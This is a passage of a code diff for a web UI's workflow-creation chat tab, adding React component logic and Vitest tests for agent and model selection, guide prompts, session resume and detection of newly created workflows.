+import { workflowAPI } from '@/api/workflow';
+
+const {
+  capturedSessionChatProps,
+  mockCreateAndSend,
+  mockSendPrompt,
+  mockSetSelectedModelKey,
+} = vi.hoisted(() => ({
+  capturedSessionChatProps: [] as any[],
+  mockCreateAndSend: vi.fn(),
+  mockSendPrompt: vi.fn(),
+  mockSetSelectedModelKey: vi.fn(),
+}));
+
+const selectedPromptModel = { providerID: 'provider-1', modelID: 'model-1' };
+const selectedModelOption = {
+  key: 'provider-1:model-1',
+  providerID: 'provider-1',
+  providerName: 'Provider',
+  modelID: 'model-1',
+  label: 'model-1',
+  pricingLabel: '',
+  contextLabel: '',
+  contextWindowTokens: 128000,
+  supportsVision: true,
+};
+
+vi.mock('@/hooks/useDefaultModelVision', () => ({
+  useDefaultModelVision: () => false,
+}));
+
+vi.mock('@/hooks/useSessionChat', () => ({
+  useSessionChat: (options: any) => ({
+    sessionId: options.initialSessionId ?? null,
+    error: null,
+    createAndSend: mockCreateAndSend,
+    retry: vi.fn(),
+  }),
+}));
+
+vi.mock('@/api/workflow', () => ({
+  workflowAPI: {
+    list: vi.fn().mockResolvedValue({ data: [] }),
+    get: vi.fn().mockResolvedValue({ data: null }),
+  },
+}));
+
+vi.mock('@/components/common/ChatPromptSelectors', () => ({
+  useChatAgentOptions: () => ({
+    agents: [{ name: 'rex', description: 'Rex', mode: 'primary', native: true }],
+    loading: false,
+  }),
+  useChatModelOptions: () => ({
+    groupedOptions: [],
+    loading: false,
+    selectedModelOption,
+    selectedPromptModel,
+    setSelectedModelKey: mockSetSelectedModelKey,
+  }),
+  ChatAgentDisplay: ({ selectedAgent }: { selectedAgent: string }) => (
+    <div>Agent:{selectedAgent}</div>
+  ),
+  ChatModelPicker: () => <div>ModelPicker</div>,
+}));
+
+vi.mock('@/components/common/SessionChat', () => ({
+  buildInstructionDisplayText: (label: string) => `@@flocks-instruction:${label}`,
+  default: (props: any) => {
+    capturedSessionChatProps.push(props);
+    return (
+      <div data-testid="session-chat">
+        {typeof props.welcomeContent === 'function'
+          ? props.welcomeContent(vi.fn())
+          : props.welcomeContent}
+        {props.toolbarSlot}
+        {props.centerToolbarSlot}
+        {props.conversationBottomSlot?.({ sendPrompt: mockSendPrompt, sending: false })}
+      </div>
+    );
+  },
+}));
+
+vi.mock('react-i18next', () => ({
+  useTranslation: () => ({
+    t: (key: string, options?: Record<string, unknown>) => {
+      const translations: Record<string, any> = {
+        'create.chat.sessionTitle': '新建工作流',
+        'create.chat.inputPlaceholder': '描述您想创建的工作流...',
+        'create.chat.contextMessage': '用户希望创建一个 Flocks 工作流，请使用 workflow-builder skill 来完成。',
+        'create.chat.welcomeMessage': '欢迎创建工作流',
+        'create.chat.emptyStateTitle': '暂无执行记录',
+        'create.chat.guidePanelTitle': 'Rex 辅助创建',
+        'create.chat.guidePanelDesc': '选择一个引导或创建案例，Rex 会按 workflow-builder skill 先确认场景。',
+        'create.chat.guideSectionTitle': '创建引导',
+        'create.chat.caseSectionTitle': '创建案例',
+        'create.chat.guideActions': [
+          {
+            label: '如何创建工作流',
+            description: '从零开始梳理业务目标、输入输出、节点流程、样例和生成步骤。',
+            prompt: '请按 workflow-builder skill 引导我从零创建一个 Flocks 工作流。',
+          },
+          {
+            label: '编辑工作流节点',
+            description: '调整节点职责、输入输出、代码或连接关系。',
+            prompt: '请帮我编辑工作流节点。',
+          },
+        ],
+        'create.chat.exampleQuestions': [
+          '帮我创建一个 IP 威胁情报查询工作流，输入 IP 地址，查询多个情报源并汇总生成报告',
+          '创建一个域名分析工作流，对域名进行 WHOIS 查询、DNS 解析和历史记录交叉分析',
+        ],
+        'create.chat.exampleQuestionLabels': [
+          '创建 IP 情报工作流',
+          '创建域名分析工作流',
+        ],
+        'detail.chat.welcome.guideCollapse': '收起',
+        'detail.chat.welcome.guideExpand': '展开',
+      };
+      const value = translations[key] ?? key;
+      return options?.returnObjects ? value : String(value);
+    },
+  }),
+}));
+
+function renderCreateChatTab(props?: Partial<ComponentProps<typeof CreateChatTab>>) {
+  return render(
+    <MemoryRouter>
+      <CreateChatTab onWorkflowCreated={vi.fn()} {...props} />
+    </MemoryRouter>,
+  );
+}
+
+describe('WorkflowCreate CreateChatTab', () => {
+  beforeEach(() => {
+    vi.clearAllMocks();
+    capturedSessionChatProps.length = 0;
+    mockCreateAndSend.mockResolvedValue('session-1');
+    vi.mocked(workflowAPI.list).mockResolvedValue({ data: [] });
+    vi.mocked(workflowAPI.get).mockResolvedValue({ data: null as any });
+  });
+
+  it('renders creation guides and case examples in a centered guide panel', async () => {
+    const user = userEvent.setup();
+    renderCreateChatTab();
+
+    expect(capturedSessionChatProps[0].suggestions).toBeUndefined();
+    expect(screen.getByText('暂无执行记录')).toBeInTheDocument();
+    expect(screen.getByText('Rex 辅助创建')).toBeInTheDocument();
+    expect(screen.getByText('创建引导')).toBeInTheDocument();
+    expect(screen.getByText('创建案例')).toBeInTheDocument();
+    expect(screen.getByTestId('create-workflow-guide-scroll')).toHaveClass('overflow-y-auto');
+    expect(screen.getByRole('button', { name: /如何创建工作流/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /编辑工作流节点/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /创建 IP 情报工作流/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /创建域名分析工作流/ })).toBeInTheDocument();
+    expect(screen.queryByText('帮我创建一个 IP 威胁情报查询工作流，输入 IP 地址，查询多个情报源并汇总生成报告')).not.toBeInTheDocument();
+
+    await user.click(screen.getByRole('button', { name: /如何创建工作流/ }));
+
+    await waitFor(() => {
+      expect(mockCreateAndSend).toHaveBeenCalledWith({
+        text: '请按 workflow-builder skill 引导我从零创建一个 Flocks 工作流。',
+        imageParts: [],
+        agent: 'rex',
+        model: selectedPromptModel,
+        displayText: '@@flocks-instruction:如何创建工作流',
+      });
+    });
+    expect(mockSendPrompt).not.toHaveBeenCalled();
+  });
+
+  it('shows the guide dock above the composer once creation starts', () => {
+    renderCreateChatTab();
+
+    const slot = capturedSessionChatProps[0].conversationBottomSlot?.({
+      sendPrompt: mockSendPrompt,
+      setInput: vi.fn(),
+      focusInput: vi.fn(),
+      sending: true,
+      streaming: false,
+      sessionId: null,
+    });
+    const { container } = render(<>{slot}</>);
+
+    expect(within(container).getByRole('button', { name: /如何创建工作流/ })).toBeDisabled();
+    expect(within(container).getByRole('button', { name: /创建 IP 情报工作流/ })).toBeDisabled();
+  });
+
+  it('reuses the workflow workbench chat controls', async () => {
+    renderCreateChatTab();
+
+    expect(screen.getByText('Agent:rex')).toBeInTheDocument();
+    expect(screen.getByText('ModelPicker')).toBeInTheDocument();
+    expect(capturedSessionChatProps[0].agentName).toBe('rex');
+    expect(capturedSessionChatProps[0].mentionAgents.map((agent: any) => agent.name)).toEqual(['rex']);
+    expect(capturedSessionChatProps[0].model).toEqual(selectedPromptModel);
+    expect(capturedSessionChatProps[0].supportsVision).toBe(true);
+    expect(capturedSessionChatProps[0].contextWindowTokens).toBe(128000);
+    expect(capturedSessionChatProps[0].display).toEqual({
+      collapseIntermediateSteps: true,
+      processGroupsDefaultOpen: false,
+    });
+    expect(capturedSessionChatProps[0].composerTextareaMinHeight).toBe(48);
+    expect(capturedSessionChatProps[0].composerTextareaMaxHeight).toBe(120);
+
+    await capturedSessionChatProps[0].onCreateAndSend(
+      '创建一个工作流',
+      [],
+      undefined,
+      undefined,
+      { displayText: '@@flocks-instruction:IP 情报' },
+    );
+
+    await waitFor(() => {
+      expect(mockCreateAndSend).toHaveBeenCalledWith({
+        text: '创建一个工作流',
+        imageParts: [],
+        agent: 'rex',
+        model: selectedPromptModel,
+        displayText: '@@flocks-instruction:IP 情报',
+      });
+    });
+  });
+
+  it('resumes a persisted create session', () => {
+    const onSessionChange = vi.fn();
+    renderCreateChatTab({
+      initialSessionId: 'session-restored',
+      onSessionChange,
+    });
+
+    expect(capturedSessionChatProps[0].sessionId).toBe('session-restored');
+    expect(capturedSessionChatProps[0].welcomeContent).toBeUndefined();
+    expect(onSessionChange).toHaveBeenCalledWith('session-restored');
+  });
+
+  it('does not attach an already-known workflow just because it was created recently', async () => {
+    const creationStartedAt = Date.now();
+    const recentKnownWorkflow = {
+      id: 'previous-workflow',
+      name: 'Previous Workflow',
+      workflowJson: { start: 'n1', nodes: [], edges: [] },
+      status: 'active',
+      source: 'global',
+      createdAt: creationStartedAt - 1000,
+      updatedAt: creationStartedAt - 1000,
+      stats: {
+        callCount: 0,
+        successCount: 0,
+        errorCount: 0,
+        totalRuntime: 0,
+        avgRuntime: 0,
+        thumbsUp: 0,
+        thumbsDown: 0,
+      },
+    };
+    vi.mocked(workflowAPI.list).mockResolvedValue({ data: [recentKnownWorkflow] });
+    const onWorkflowCreated = vi.fn();
+
+    renderCreateChatTab({
+      initialSessionId: 'session-active',
+      creationStartedAt,
+      onWorkflowCreated,
+    });
+
+    await waitFor(() => {
+      expect(workflowAPI.list).toHaveBeenCalledTimes(1);
+    });
+
+    capturedSessionChatProps[capturedSessionChatProps.length - 1]?.onStreamingDone?.();
+
+    await waitFor(() => {
+      expect(workflowAPI.list).toHaveBeenCalledTimes(2);
+    });
+    expect(onWorkflowCreated).not.toHaveBeenCalled();
+  });
+
+  it('attaches the workflow identified by a workflow.created SSE event', async () => {
+    const creationStartedAt = Date.now();
+    const createdWorkflow = {
+      id: 'created-by-this-event',
+      name: 'Created By This Event',
+      workflowJson: { start: 'n1', nodes: [], edges: [] },
+      status: 'active',
+      source: 'global',
+      createdAt: creationStartedAt + 100,
+      updatedAt: creationStartedAt + 100,
+      stats: {
+        callCount: 0,
+        successCount: 0,
+        errorCount: 0,
+        totalRuntime: 0,
+        avgRuntime: 0,
+        thumbsUp: 0,
+        thumbsDown: 0,
+      },
+    };
+    vi.mocked(workflowAPI.get).mockResolvedValue({ data: createdWorkflow });
+    const onWorkflowCreated = vi.fn();
+
+    renderCreateChatTab({
+      initialSessionId: 'session-active',
+      creationStartedAt,
+      onWorkflowCreated,
+    });
+
+    await waitFor(() => {
+      expect(workflowAPI.list).toHaveBeenCalledTimes(1);
+    });
+
+    capturedSessionChatProps[capturedSessionChatProps.length - 1]?.onSSEEvent?.({
+      type: 'workflow.created',
+      properties: { id: 'created-by-this-event' },
+    });
+
+    await waitFor(() => {
+      expect(workflowAPI.get).toHaveBeenCalledWith('created-by-this-event');
+    });
+    expect(onWorkflowCreated).toHaveBeenCalledWith(createdWorkflow);
+  });
+
+  it('replays workflow.created events that arrive before the initial snapshot is ready', async () => {
+    const creationStartedAt = Date.now();
+    const createdWorkflow = {
+      id: 'created-before-snapshot-ready',
+      name: 'Created Before Snapshot Ready',
+      workflowJson: { start: 'n1', nodes: [], edges: [] },
+      status: 'active',
+      source: 'global',
+      createdAt: creationStartedAt + 100,
+      updatedAt: creationStartedAt + 100,
+      stats: {
+        callCount: 0,
+        successCount: 0,
+        errorCount: 0,
+        totalRuntime: 0,
+        avgRuntime: 0,
+        thumbsUp: 0,
+        thumbsDown: 0,
+      },
+    };
+    let resolveSnapshot: ((value: { data: typeof createdWorkflow[] }) => void) | undefined;
+    vi.mocked(workflowAPI.list).mockReturnValueOnce(new Promise((resolve) => {
+      resolveSnapshot = resolve;
+    }) as any);
+    vi.mocked(workflowAPI.get).mockResolvedValue({ data: createdWorkflow });
+    const onWorkflowCreated = vi.fn();
+
+    renderCreateChatTab({
+      initialSessionId: 'session-active',
+      creationStartedAt,
+      onWorkflowCreated,
+    });
+
+    capturedSessionChatProps[capturedSessionChatProps.length - 1]?.onSSEEvent?.({
+      type: 'workflow.created',
+      properties: { id: 'created-before-snapshot-ready' },
+    });
+
+    expect(workflowAPI.get).not.toHaveBeenCalled();
+
+    await act(async () => {
+      resolveSnapshot?.({ data: [createdWorkflow] });
+    });
+
+    await waitFor(() => {
+      expect(workflowAPI.get).toHaveBeenCalledWith('created-before-snapshot-ready');
+    });
+    expect(onWorkflowCreated).toHaveBeenCalledWith(createdWorkflow);
+  });
+
+  it('does not guess when fallback polling sees multiple fresh workflows', async () => {
+    const creationStartedAt = Date.now();
+    const makeWorkflow = (id: string) => ({
+      id,
+      name: id,
+      workflowJson: { start: 'n1', nodes: [], edges: [] },
+      status: 'active',
+      source: 'global',
+      createdAt: creationStartedAt + 100,
+      updatedAt: creationStartedAt + 100,
+      stats: {
+        callCount: 0,
+        successCount: 0,
+        errorCount: 0,
+        totalRuntime: 0,
+        avgRuntime: 0,
+        thumbsUp: 0,
+        thumbsDown: 0,
+      },
+    });
+    vi.mocked(workflowAPI.list)
+      .mockResolvedValueOnce({ data: [] })
+      .mockResolvedValueOnce({ data: [makeWorkflow('first'), makeWorkflow('second')] });
+    const onWorkflowCreated = vi.fn();
+
+    renderCreateChatTab({
+      initialSessionId: 'session-active',
+      creationStartedAt,
+      onWorkflowCreated,
+    });
+
+    await waitFor(() => {
+      expect(workflowAPI.list).toHaveBeenCalledTimes(1);
+    });
+
+    capturedSessionChatProps[capturedSessionChatProps.length - 1]?.onStreamingDone?.();
+
+    await waitFor(() => {
+      expect(workflowAPI.list).toHaveBeenCalledTimes(2);
+    });
+    expect(onWorkflowCreated).not.toHaveBeenCalled();
+  });
+});
diff --git a/webui/src/pages/WorkflowCreate/CreateChatTab.tsx b/webui/src/pages/WorkflowCreate/CreateChatTab.tsx
index 5638627bb..d569b72bb 100644
--- a/webui/src/pages/WorkflowCreate/CreateChatTab.tsx
+++ b/webui/src/pages/WorkflowCreate/CreateChatTab.tsx
@@ -1,80 +1,232 @@
-import { useState, useEffect, useRef, useCallback } from 'react';
-import { AlertCircle } from 'lucide-react';
+import { useState, useEffect, useRef, useCallback, useMemo } from 'react';
+import { AlertCircle, Bot } from 'lucide-react';
 import { useTranslation } from 'react-i18next';
-import SessionChat, { type SSEChatEvent } from '@/components/common/SessionChat';
+import SessionChat, {
+  buildInstructionDisplayText,
+  type PromptDisplayOptions,
+  type SSEChatEvent,
+} from '@/components/common/SessionChat';
+import {
+  ChatAgentDisplay,
+  ChatModelPicker,
+  useChatAgentOptions,
+  useChatModelOptions,
+} from '@/components/common/ChatPromptSelectors';
+import ChatGuideDock, { type ChatGuideAction } from '@/components/common/ChatGuideDock';
+import GuidedCreatePanel from '@/components/common/GuidedCreatePanel';
 import { useSessionChat } from '@/hooks/useSessionChat';
 import { useDefaultModelVision } from '@/hooks/useDefaultModelVision';
 import { workflowAPI, Workflow } from '@/api/workflow';
+import type { ImagePartData } from '@/utils/imageUpload';
 
 const FALLBACK_POLL_MS = 10_000;
+const WORKFLOW_CHAT_AGENT_NAME = 'rex';
+const WORKFLOW_CHAT_AGENT_NAMES = [WORKFLOW_CHAT_AGENT_NAME];
 
 interface CreateChatTabProps {
   onWorkflowCreated: (workflow: Workflow) => void;
+  initialSessionId?: string | null;
+  creationStartedAt?: number;
+  onSessionChange?: (sessionId: string | null) => void;
+  launchRequest?: CreateWorkflowChatLaunchRequest | null;
+  onLaunchRequestHandled?: (id: number) => void;
 }
 
-export default function CreateChatTab({ onWorkflowCreated }: CreateChatTabProps) {
+export interface CreateWorkflowChatLaunchRequest {
+  id: number;
+  prompt: string;
+  displayLabel?: string;
+}
+
+function normalizeGuideActions(value: unknown): ChatGuideAction[] {
+  if (!Array.isArray(value)) return [];
+  return value
+    .map((item) => {
+      if (!item || typeof item !== 'object') return null;
+      const raw = item as Record<string, unknown>;
+      const label = String(raw.label ?? '').trim();
+      const description = String(raw.description ?? '').trim();
+      const prompt = String(raw.prompt ?? '').trim();
+      const group = String(raw.group ?? '').trim();
+      if (!label || !prompt) return null;
+      return {
+        label,
+        description: description || prompt,
+        prompt,
+        ...(group ? { group } : {}),
+      };
+    })
+    .filter((item): item is ChatGuideAction => Boolean(item));
+}
+
+export default function CreateChatTab({
+  onWorkflowCreated,
+  initialSessionId = null,
+  creationStartedAt,
+  onSessionChange,
+  launchRequest,
+  onLaunchRequestHandled,
+}: CreateChatTabProps) {
   const { t } = useTranslation('workflow');
-  const supportsVision = useDefaultModelVision();
+  const defaultSupportsVision = useDefaultModelVision();
+  const guideSectionTitle = t('create.chat.guideSectionTitle');
+  const caseSectionTitle = t('create.chat.caseSectionTitle');
 
+  const guideActions = useMemo(() => (
+    normalizeGuideActions(t('create.chat.guideActions', { returnObjects: true }))
+      .map((action) => ({ ...action, group: guideSectionTitle }))
+  ), [guideSectionTitle, t]);
   const exampleQuestions = t('create.chat.exampleQuestions', { returnObjects: true }) as string[];
+  const exampleQuestionLabels = t('create.chat.exampleQuestionLabels', { returnObjects: true }) as string[];
+  const { agents: workflowChatAgents } = useChatAgentOptions({
+    allowedAgentNames: WORKFLOW_CHAT_AGENT_NAMES,
+  });
+  const {
+    groupedOptions: groupedChatModelOptions,
+    loading: loadingChatModels,
+    selectedModelOption,
+    selectedPromptModel,
+    setSelectedModelKey,
+  } = useChatModelOptions();
+  const supportsVision = selectedModelOption?.supportsVision ?? defaultSupportsVision;
+  const exampleActions = useMemo(() => (
+    (Array.isArray(exampleQuestions) ? exampleQuestions : []).map((question, index) => ({
+      label: Array.isArray(exampleQuestionLabels) && exampleQuestionLabels[index]
+        ? exampleQuestionLabels[index]
+        : question,
+      description: question,
+      prompt: question,
+      group: caseSectionTitle,
+    }))
+  ), [caseSectionTitle, exampleQuestionLabels, exampleQuestions]);
+  const quickActions = useMemo(() => (
+    [...guideActions, ...exampleActions]
+  ), [exampleActions, guideActions]);
 
   const { sessionId, error, createAndSend, retry } = useSessionChat({
     title: t('create.chat.sessionTitle'),
     category: 'workflow',
     contextMessage: t('create.chat.contextMessage'),
     welcomeMessage: t('create.chat.welcomeMessage'),
+    initialSessionId,
   });
 
   const knownIdsRef = useRef<Set<string>>(new Set());
+  const snapshotStartedAtRef = useRef<number | null>(null);
   const createdWorkflowRef = useRef<string | null>(null);
+  const pendingWorkflowEventIdsRef = useRef<Set<string>>(new Set());
+  const pendingDetectionRef = useRef(false);
   const [snapshotReady, setSnapshotReady] = useState(false);
   const onWorkflowCreatedRef = useRef(onWorkflowCreated);
   onWorkflowCreatedRef.current = onWorkflowCreated;
 
+  useEffect(() => {
+    onSessionChange?.(sessionId ?? null);
+  }, [onSessionChange, sessionId]);
+
   // Snapshot existing workflow IDs on mount
   useEffect(() => {
     (async () => {
+      setSnapshotReady(false);
+      const snapshotStartedAt = Date.now();
+      const freshBoundary = Math.max(creationStartedAt ?? 0, snapshotStartedAt) - 500;
+      snapshotStartedAtRef.current = snapshotStartedAt;
       try {
         const snap = await workflowAPI.list();
-        knownIdsRef.current = new Set((snap.data as Workflow[]).map((w) => w.id));
+        knownIdsRef.current = new Set((snap.data as Workflow[])
+          .filter((w) => {
+            const createdAt = Number(w.createdAt ?? 0);
+            return !(createdAt > 0 && createdAt >= freshBoundary);
+          })
+          .map((w) => w.id));
       } catch {
         knownIdsRef.current = new Set();
       }
       setSnapshotReady(true);
     })();
-  }, []);
+  }, [creationStartedAt]);
 
-  // Check for new workflows (used by both SSE and polling)
+  const attachCreatedWorkflow = useCallback((workflow?: Workflow | null): boolean => {
+    if (!workflow?.id || !snapshotReady) return false;
+    if (knownIdsRef.current.has(workflow.id) || workflow.id === createdWorkflowRef.current) {
+      return false;
+    }
+    const createdAt = Number(workflow.createdAt ?? 0);
+    const startedAt = Math.max(creationStartedAt ?? 0, snapshotStartedAtRef.current ?? 0);
+    if (startedAt > 0 && createdAt > 0 && createdAt < startedAt - 500) {
+      return false;
+    }
+    createdWorkflowRef.current = workflow.id;
+    onWorkflowCreatedRef.current(workflow);
+    return true;
+  }, [creationStartedAt, snapshotReady]);
+
+  const attachCreatedWorkflowById = useCallback(async (workflowId: string) => {
+    if (!workflowId) return;
+    if (!snapshotReady) {
+      pendingWorkflowEventIdsRef.current.add(workflowId);
+      return;
+    }
+    try {
+      const res = await workflowAPI.get(workflowId);
+      attachCreatedWorkflow(res.data);
+    } catch {
+      // The workflow file may still be settling; polling can recover it.
+    }
+  }, [attachCreatedWorkflow, snapshotReady]);
+
+  // Check for new workflows (used by fallback polling and post-stream refresh)
   const detectNewWorkflow = useCallback(async () => {
-    if (!snapshotReady) return;
+    if (!snapshotReady) {
+      pendingDetectionRef.current = true;
+      return;
+    }
     try {
       const res = await workflowAPI.list();
       const workflows: Workflow[] = res.data;
-      const fresh = workflows.find(
-        (w) =>
-          !knownIdsRef.current.has(w.id) &&
-          w.id !== createdWorkflowRef.current,
-      );
-      if (fresh) {
-        createdWorkflowRef.current = fresh.id;
-        onWorkflowCreatedRef.current(fresh);
+      const sortedWorkflows = [...workflows].sort((a, b) => Number(b.createdAt ?? 0) - Number(a.createdAt ?? 0));
+      const startedAt = Math.max(creationStartedAt ?? 0, snapshotStartedAtRef.current ?? 0);
+      const freshCandidates = sortedWorkflows.filter((w) => {
+        if (knownIdsRef.current.has(w.id) || w.id === createdWorkflowRef.current) return false;
+        const createdAt = Number(w.createdAt ?? 0);
+        return !(startedAt > 0 && createdAt > 0 && createdAt < startedAt - 500);
+      });
+      if (freshCandidates.length === 1) {
+        attachCreatedWorkflow(freshCandidates[0]);
       }
     } catch { /* ignore */ }
-  }, [snapshotReady]);
+  }, [attachCreatedWorkflow, creationStartedAt, snapshotReady]);
+
+  useEffect(() => {
+    if (!snapshotReady) return;
+
+    if (pendingWorkflowEventIdsRef.current.size > 0) {
+      const ids = Array.from(pendingWorkflowEventIdsRef.current);
+      pendingWorkflowEventIdsRef.current.clear();
+      ids.forEach((id) => {
+        void attachCreatedWorkflowById(id);
+      });
+    }
+
+    if (pendingDetectionRef.current) {
+      pendingDetectionRef.current = false;
+      void detectNewWorkflow();
+    }
+  }, [attachCreatedWorkflowById, detectNewWorkflow, snapshotReady]);
 
   // SSE: react to workflow.created events immediately
   const handleSSEEvent = useCallback(
     (event: SSEChatEvent) => {
       if (event.type === 'workflow.created' && event.properties?.id) {
-        detectNewWorkflow();
+        void attachCreatedWorkflowById(String(event.properties.id));
       }
     },
-    [detectNewWorkflow],
+    [attachCreatedWorkflowById],
   );
 
   // Primary: check right after AI finishes streaming
   const handleStreamingDone = useCallback(() => {
-    detectNewWorkflow();
+    void detectNewWorkflow();
   }, [detectNewWorkflow]);
 
   // Fallback polling for filesystem-driven creation (Rex writes directly)
@@ -85,6 +237,33 @@ export default function CreateChatTab({ onWorkflowCreated }: CreateChatTabProps)
     return () => clearInterval(timer);
   }, [sessionId, snapshotReady, detectNewWorkflow]);
 
+  const handleCreateAndSend = useCallback(
+    async (
+      text: string,
+      imageParts?: ImagePartData[],
+      agentOverride?: string,
+      modelOverride?: { providerID: string; modelID: string } | null,
+      options?: PromptDisplayOptions,
+    ) => {
+      await createAndSend({
+        text,
+        imageParts,
+        agent: agentOverride || WORKFLOW_CHAT_AGENT_NAME,
+        model: modelOverride === undefined ? selectedPromptModel : modelOverride,
+        displayText: options?.displayText,
+      });
+    },
+    [createAndSend, selectedPromptModel],
+  );
+
+  const handleWelcomeGuidePrompt = useCallback(
+    (prompt: string, label: string) => {
+      void handleCreateAndSend(prompt, [], undefined, undefined, {
+        displayText: buildInstructionDisplayText(label),
+      });
+    },
+    [handleCreateAndSend],
+  );
 
   if (error) {
     return (
@@ -109,12 +288,88 @@ export default function CreateChatTab({ onWorkflowCreated }: CreateChatTabProps)
       live={!!sessionId}
       placeholder={t('create.chat.inputPlaceholder')}
       className="h-full"
-      suggestions={exampleQuestions}
+      display={{ collapseIntermediateSteps: true, processGroupsDefaultOpen: false }}
+      agentName={WORKFLOW_CHAT_AGENT_NAME}
+      mentionAgents={workflowChatAgents}
       supportsVision={supportsVision}
+      contextWindowTokens={selectedModelOption?.contextWindowTokens ?? null}
+      model={selectedPromptModel}
       onStreamingDone={handleStreamingDone}
       onSSEEvent={handleSSEEvent}
-      onCreateAndSend={!sessionId ? (text, imageParts) => createAndSend({ text, imageParts }) : undefined}
+      onCreateAndSend={!sessionId ? handleCreateAndSend : undefined}
+      welcomeContent={!sessionId ? (
+        <GuidedCreatePanel
+          emptyTitle={t('create.chat.emptyStateTitle')}
+          icon={<Bot className="h-5 w-5" />}
+          title={t('create.chat.guidePanelTitle')}
+          description={t('create.chat.guidePanelDesc')}
+          groups={[
+            { title: t('create.chat.guideSectionTitle'), actions: guideActions },
+            { title: t('create.chat.caseSectionTitle'), actions: exampleActions },
+          ]}
+          scrollTestId="create-workflow-guide-scroll"
+          onStartPrompt={handleWelcomeGuidePrompt}
+        />
+      ) : undefined}
+      composerTextareaMinHeight={48}
+      composerTextareaMaxHeight={120}
+      toolbarSlot={
+        <ChatAgentDisplay
+          agents={workflowChatAgents}
+          selectedAgent={WORKFLOW_CHAT_AGENT_NAME}
+        />
+      }
+      centerToolbarSlot={
+        <ChatModelPicker
+          groupedOptions={groupedChatModelOptions}
+          loading={loadingChatModels}
+          selectedModelOption={selectedModelOption}
+          onSelectModel={(option) => setSelectedModelKey(option.key)}
+        />
+      }
+      conversationBottomSlot={({ sendPrompt, sending, streaming }) => (
+        <>
+          <CreateWorkflowLaunchRequestRunner
+            launchRequest={launchRequest}
+            onLaunchRequestHandled={onLaunchRequestHandled}
+            onStartPrompt={(prompt, label) => sendPrompt(prompt, {
+              displayText: label ? buildInstructionDisplayText(label) : undefined,
+            })}
+          />
+          {sessionId || sending || streaming ? (
+            <ChatGuideDock
+              actions={quickActions}
+              disabled={sending || streaming}
+              collapseTitle={t('detail.chat.welcome.guideCollapse')}
+              expandTitle={t('detail.chat.welcome.guideExpand')}
+              onStartPrompt={(prompt, label) => sendPrompt(prompt, {
+                displayText: buildInstructionDisplayText(label),
+              })}
+            />
+          ) : null}
+        </>
+      )}
     />
   );
 }
 
+function CreateWorkflowLaunchRequestRunner({
+  launchRequest,
+  onLaunchRequestHandled,
+  onStartPrompt,
+}: {
+  launchRequest?: CreateWorkflowChatLaunchRequest | null;
+  onLaunchRequestHandled?: (id: number) => void;
+  onStartPrompt: (text: string, label?: string) => void;
+}) {
+  const handledLaunchRequestRef = useRef<number | null>(null);
+
+  useEffect(() => {
+    if (!launchRequest || handledLaunchRequestRef.current === launchRequest.id) return;
+    handledLaunchRequestRef.current = launchRequest.id;
+    onStartPrompt(launchRequest.prompt, launchRequest.displayLabel);
+    onLaunchRequestHandled?.(launchRequest.id);
+  }, [launchRequest, onLaunchRequestHandled, onStartPrompt]);
+
+  return null;
+}
diff --git a/webui/src/pages/WorkflowCreate/CreateRightPanel.test.tsx b/webui/src/pages/WorkflowCreate/CreateRightPanel.test.tsx
new file mode 100644
index 000000000..e439f4181
--- /dev/null
+++ b/webui/src/pages/WorkflowCreate/CreateRightPanel.test.tsx
@@ -0,0 +1,164 @@
+import { render, screen } from '@testing-library/react';
+import userEvent from '@testing-library/user-event';
+import { describe, expect, it, vi } from 'vitest';
+
+import type { Workflow } from '@/api/workflow';
+import CreateRightPanel from './CreateRightPanel';
+
+const { capturedCreateChatTabProps, capturedIntegrationTabProps } = vi.hoisted(() => ({
+  capturedCreateChatTabProps: [] as any[],
+  capturedIntegrationTabProps: [] as any[],
+}));
+
+vi.mock('./CreateChatTab', () => ({
+  default: (props: any) => {
+    capturedCreateChatTabProps.push(props);
+    return <div>Workbench content</div>;
+  },
+}));
+
+vi.mock('./CreateOverviewTab', () => ({
+  default: () => <div>Overview content</div>,
+}));
+
+vi.mock('../WorkflowDetail/tabs/IntegrationTab', () => ({
+  default: ({ workflow, onGuidePrompt }: { workflow: Workflow; onGuidePrompt?: (prompt: string, label: string) => void }) => {
+    capturedIntegrationTabProps.push({ workflow, onGuidePrompt });
+    return (
+      <div>
+        <div>Publish content for {workflow.id}</div>
+        <button
+          type="button"
+          onClick={() => onGuidePrompt?.('publish api prompt', '发布为 API')}
+        >
+          发布为 API
+        </button>
+      </div>
+    );
+  },
+}));
+
+vi.mock('react-i18next', () => ({
+  useTranslation: () => ({
+    t: (key: string) => {
+      const translations: Record<string, string> = {
+        'create.rightPanel.tabOverview': '详情',
+        'create.rightPanel.tabChat': '工作台',
+        'create.rightPanel.tabIntegration': '发布',
+        'create.publish.emptyTitle': '等待生成工作流',
+        'create.publish.emptyHint': '工作流生成后，可以在这里配置发布方式。',
+      };
+      return translations[key] ?? key;
+    },
+  }),
+}));
+
+const workflow: Workflow = {
+  id: 'generated_workflow',
+  name: 'Generated Workflow',
+  category: 'default',
+  status: 'draft',
+  source: 'project',
+  createdAt: 1,
+  updatedAt: 1,
+  workflowJson: {
+    start: 'start',
+    nodes: [],
+    edges: [],
+  },
+  stats: {
+    callCount: 0,
+    successCount: 0,
+    errorCount: 0,
+    totalRuntime: 0,
+    avgRuntime: 0,
+    thumbsUp: 0,
+    thumbsDown: 0,
+  },
+};
+
+describe('WorkflowCreate CreateRightPanel', () => {
+  beforeEach(() => {
+    capturedCreateChatTabProps.length = 0;
+    capturedIntegrationTabProps.length = 0;
+  });
+
+  it('opens on the workbench tab and exposes a publish tab', () => {
+    render(
+      <CreateRightPanel
+        workflow={null}
+        open
+        width={420}
+        onWorkflowCreated={vi.fn()}
+      />,
+    );
+
+    expect(screen.getByRole('button', { name: '详情' })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: '工作台' })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: '发布' })).toBeInTheDocument();
+    expect(screen.getByText('Workbench content')).toBeInTheDocument();
+  });
+
+  it('shows a publish placeholder before the workflow is generated', async () => {
+    const user = userEvent.setup();
+    render(
+      <CreateRightPanel
+        workflow={null}
+        open
+        width={420}
+        onWorkflowCreated={vi.fn()}
+      />,
+    );
+
+    await user.click(screen.getByRole('button', { name: '发布' }));
+
+    expect(screen.getByText('等待生成工作流')).toBeInTheDocument();
+    expect(screen.getByText('工作流生成后，可以在这里配置发布方式。')).toBeInTheDocument();
+  });
+
+  it('reuses the workflow publish tab after generation', async () => {
